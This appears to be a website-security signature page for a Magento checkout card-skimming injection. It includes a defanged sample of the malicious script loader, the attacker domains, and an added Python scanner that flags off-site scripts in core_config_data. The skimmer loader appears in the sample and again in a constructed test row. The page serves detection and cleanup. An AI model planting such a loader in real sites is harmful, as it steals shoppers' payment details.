SiteCheck Signatures


malware.magento_shoplift.38.1

Description: Injection of malicious scripts into Magento checkout pages. The scripts steal entered payment details and send them to remote third-party sites.

The scripts are typically injected into the core_config_data table.

Sample:

<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>

Domains involved: googieapls[.]com, mcloudjs[.]com
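
Added example (not part of the SiteCheck signature or its scanner): a Python check that walks core_config_data rows and reports every value that loads a script from another host, marking the two domains listed above as known-bad. The in-memory SQLite table, its rows, the config paths used in them and the allowed_hosts parameter are constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Domains listed on this page, stored defanged as published and refanged here.
KNOWN_BAD = {d.replace("[.]", ".") for d in ("googieapls[.]com", "mcloudjs[.]com")}
# Matches both src="..." attributes and dynamic `po.src = '...'` assignments.
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

def script_hosts(value):
    """Return the external hostnames a config value loads scripts from."""
    hosts = set()
    for url in SRC_RE.findall(value.replace("[.]", ".")):
        if url.startswith("//"):          # protocol-relative, as in the sample
            url = "https:" + url
        host = urlparse(url).hostname     # None for relative paths
        if host:
            hosts.add(host.lower())
    return hosts

def scan_config(conn, allowed_hosts=()):
    """Return (config_id, path, host, verdict) for rows loading off-site scripts."""
    findings = []
    rows = conn.execute("SELECT config_id, path, value FROM core_config_data "
                        "WHERE value IS NOT NULL ORDER BY config_id")
    for config_id, path, value in rows:
        for host in sorted(script_hosts(value)):
            if any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD):
                findings.append((config_id, path, host, "known-bad"))
            elif host not in allowed_hosts:
                findings.append((config_id, path, host, "review"))
    return findings

def constructed_db():
    """In-memory stand-in for a Magento database; every row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE core_config_data (config_id INTEGER PRIMARY KEY, "
                 "scope TEXT, scope_id INTEGER, path TEXT, value TEXT)")
    conn.executemany("INSERT INTO core_config_data VALUES (?, ?, ?, ?, ?)", [
        (1, "default", 0, "web/unsecure/base_url", "https://shop.example/"),
        (2, "default", 0, "design/head/includes",
         '<script src="https://cdn.shop.example/analytics.js"></script>'),
        (3, "default", 0, "design/footer/absolute_footer",
         "<script>var po = document.createElement('script'); po.async = true; "
         "po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262';</script>"),
        (4, "stores", 1, "design/head/includes",
         "<script src='//static.thirdparty.example/w.js'></script>"),
    ])
    return conn

if __name__ == "__main__":
    for finding in scan_config(constructed_db(), allowed_hosts={"cdn.shop.example"}):
        print(finding)
```

Rows marked "review" are not confirmed malicious; they are off-site script hosts missing from the allowlist that an administrator should account for.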

For additional details check the Ecommerce security category of our blog.

Affecting: Magento

Mitigation: How to clean a hacked Magento site